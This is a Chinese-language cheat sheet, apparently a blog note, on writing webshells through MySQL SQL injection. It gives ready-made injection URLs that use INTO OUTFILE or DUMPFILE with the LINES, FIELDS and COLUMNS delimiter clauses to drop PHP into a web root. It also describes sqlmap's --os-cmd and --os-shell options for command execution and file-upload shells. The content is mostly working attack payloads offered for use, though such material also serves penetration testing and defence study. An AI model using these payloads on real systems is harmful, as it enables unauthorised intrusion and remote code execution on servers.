SQL注入写shell的几种语句
需要绝对路径和权限。
union select 后写入
lines terminated by 写入
lines starting by 写入
fields terminated by 写入
COLUMNS terminated by 写入
union select 后写入
最常见的写入方式,union select 后跟 into outfile 语句
http://1.1.1.1/x/x.php?id=1 union select 1,2,3,4,’<?php phpinfo() ?>’ into outfile ‘C:/wamp64/www/work/webshell.php’
http://1.1.1.1/x/x.php?id=1 union select 1,2,3,4,’<?php phpinfo() ?>’ into dumpfile ‘C:/wamp64/www/work/webshell.php’
PS: 在windows下,位置的分隔符为 /(斜杠)。
lines terminated by 写入
注入点语句
http://1.1.1.1/x/x.php?id=1 into outfile ‘C:/wamp64/www/work/webshell.php’ lines terminated by ‘<?php phpinfo() ?>’;
http://1.1.1.1/x/x.php?id=1 limit 1 into outfile ‘C:/wamp64/www/work/webshell.php’ lines terminated by ‘<?php phpinfo() ?>’;
lines starting by 写入
注入点语句
http://1.1.1.1/x/x.php?id=1 into outfile ‘C:/wamp64/www/work/webshell.php’ lines starting by ‘<?php phpinfo() ?>’;
http://1.1.1.1/x/x.php?id=1 limit 1 into outfile ‘C:/wamp64/www/work/webshell.php’ lines starting by ‘<?php phpinfo() ?>’;
注入原理
利用 lines starting by 语句拼接webshell的内容。lines starting by 可以理解为 以每行开始的位置添加 xx 内容。
fields terminated by 写入
注入点语句
http://1.1.1.1/x/x.php?id=1 into outfile ‘C:/wamp64/www/work/webshell.php’ fields terminated by ‘<?php phpinfo() ?>’;
http://1.1.1.1/x/x.php?id=1 limit 1 into outfile ‘C:/wamp64/www/work/webshell.php’ fields terminated by ‘<?php phpinfo() ?>’;
注入原理
利用 fields terminated by 语句拼接webshell的内容。fields terminated by 可以理解为 以每个字段的位置添加 xx 内容。
COLUMNS terminated by 写入
注入点语句
http://1.1.1.1/x/x.php?id=1 into outfile ‘C:/wamp64/www/work/webshell.php’ COLUMNS terminated by ‘<?php phpinfo() ?>’;
http://1.1.1.1/x/x.php?id=1 limit 1 into outfile ‘C:/wamp64/www/work/webshell.php’ COLUMNS terminated by ‘<?php phpinfo() ?>’;
注入原理
利用 fields terminated by 语句拼接webshell的内容。fields terminated by 可以理解为 以每个字段的位置添加 xx 内容。
sqlmap写shell
前提都是需要对目标目录具有写权限。
–os-cmd=“net user”
交互式命令执行,注意在使用交互式方式时需要知道网站的绝对路径,执行成功之后在绝对路径
下创建文件返回结果,然后再自动删除。
–os-shell
写webshell,会生成两个文件,tmpbshrd.php和tmpucnll.php,分别为命令执行和文件上传webshell。
注意:关闭sqlmap文件就会被删除。
参考:https://manning23.github.io/2019/07/23/MYSQL%E5%AD%98%E5%9C%A8%E6%B3%A8%E5%85%A5%E7%82%B9%EF%BC%8C%E5%86%99WebShell%E7%9A%845%E7%A7%8D%E6%96%B9%E5%BC%8F/